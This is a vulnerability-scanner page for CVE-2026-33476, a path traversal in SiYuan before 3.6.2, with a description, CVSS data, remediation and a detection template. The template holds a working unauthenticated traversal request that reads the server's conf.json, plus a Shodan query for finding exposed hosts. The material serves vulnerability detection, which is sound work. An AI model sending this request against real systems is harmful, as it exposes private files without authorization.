SiYuan <= v3.6.1 - Path Traversal
CVE-2026-33476
Verified
Description
SiYuan is a personal knowledge management system. Prior to version 3.6.2, the Siyuan kernel exposes an unauthenticated file-serving endpoint under `/appearance/*filepath.` Due to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process. Authentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials. Version 3.6.2 fixes this issue.
Severity
High
CVSS Score
7.5
Exploit Probability
3%
Affected Product
siyuan
Published Date
June 3, 2026
Template Author
wrg-11
CVE-2026-33476.yaml
id: CVE-2026-33476
info:
name: SiYuan <= v3.6.1 - Path Traversal
author: WRG-11
severity: high
description: |
SiYuan is a personal knowledge management system. Prior to version 3.6.2, the Siyuan kernel exposes an unauthenticated file-serving endpoint under `/appearance/*filepath.` Due to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process. Authentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials. Version 3.6.2 fixes this issue.
impact: |
Unauthenticated attackers can read arbitrary files accessible to the server, potentially exposing sensitive information.
remediation: |
Update to version 3.6.2 or later.
reference:
- https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7
- https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2a
- https://nvd.nist.gov/vuln/detail/CVE-2026-33476
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-33476
epss-score: 0.03256
epss-percentile: 0.86836
cwe-id: CWE-22
metadata:
verified: true
max-request: 1
vendor: siyuan-note
product: siyuan
shodan-query: http.favicon.hash:-1450125239
tags: cve,cve2026,siyuan,lfi,traversal,exposure
http:
- raw:
- |
GET /appearance/langs/../../conf.json HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"kernelVersion"'
- '"logLevel"'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a004630440220416a42ebd07372992bffaa22bb63184bac216631b61ef79b7ba526180829fa4e02201347d25b47c58c100accceed7a82515128744f94f24eec23eeb729efa33701d5:922c64590222798bb761d5b6d8e729507.5Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-33476
CWE ID:
cwe-22
Remediation Steps
Update to version 3.6.2 or later.